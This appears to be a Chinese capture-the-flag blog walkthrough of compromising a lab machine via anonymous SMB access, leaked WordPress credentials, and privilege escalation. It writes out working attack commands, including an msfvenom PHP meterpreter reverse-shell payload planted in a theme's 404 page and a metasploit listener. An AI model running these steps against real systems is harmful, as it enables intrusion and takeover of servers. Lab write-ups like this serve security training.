• CTF-SMB信息泄露详细版


    SMB信息泄露

    攻击机ip:192.168.1.2

    靶机ip:192.168.1.3

    首先先介绍下SMB服务。以下来至百度

    SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

    SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

    SMB协议,计算机可以访问网络资源,下载对应的资源文件

    首先我们先扫描端口。 nmap -sV 靶场ip

    发现http端口开启,那么我们用dirb命令扫描下网站目录,发现了两个登陆页面

    phpadmin和wp-admin

    那么我们就继续挖掘信息寻找登陆账号和密码。我们发现SMB端口打开,那么我们使用命令

    smbclient -L 靶场ip   ---查看SMB有哪些开放得服务资源

    提示输入密码,那么我们使用弱口令或者空口令尝试,发现空口令可以成功登陆

    最后我们发现得三个资源中只有share$能进行访问,那么我们就使用命令smbclient '\靶场ipshare$'进去

    发现有三个.txt文件,我们逐一下载(使用get下载)

    打开deets.txt发现有个密码,我们把它记下,或许后面有用

    我们此时找到了一个密码,那还需要用户名,我们在继续在share$里面找找。想起我们有一个登陆页面是wp-admin,那再share$里面不是有个类似得wordpress嘛,我们cd进入试试,这一试不得了啊,发现了不少好多西

    看见了配置文件,那么我们直接把它get下来,然后查看发现了username和password!

    那我们直接拿这两个再wp-admin登陆页面登陆。哎!登陆成功了!进入了网站的后台!

    既然进入了后台,那么我们肯定回本能的想留下个webshell,那么开搞!

    使用msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

    这条命令在我们攻击机的桌面上形成一个shell.php的webshell。然后我们打开网站后台的Appearance目录下的editor,在404页面上传webshell代码

    然后打开metalspolit,选择hardya模块启动监听

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload php/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 攻击机IP地址

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > run

    然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php 获取反弹shell(看网页回显哪个固定路径就使用哪个)

    反弹成功,但是我们还需优化会话

    使用命令python -c "import pty; pty.spawn('/bin/bash')"进行优化即可

    然后使用命令cat /etc/paawd 查询用户名,然后发现home目录下有个togie用户,su togie去切换到togie,,su togie。提示需要密码,我们想起之前deets.txt文件中的12345这个密码,输入,成功!然后我们还需要提权到root,那么我们使用命令 sudo su进行提权,成功!

    既然拿到了froot权限,那岂不是为所欲为了,后面的查找flag.txt我就不写啦!

  • 相关阅读:
    hlgoj 1766 Cubing
    Reverse Linked List
    String to Integer
    Bitwise AND of Numbers Range
    Best Time to Buy and Sell Stock III
    First Missing Positive
    Permutation Sequence
    Next Permutation
    Gray Code
    Number of Islands
  • 原文地址:https://www.cnblogs.com/Hbbbb/p/12616619.html
Copyright © 2020-2023  润新知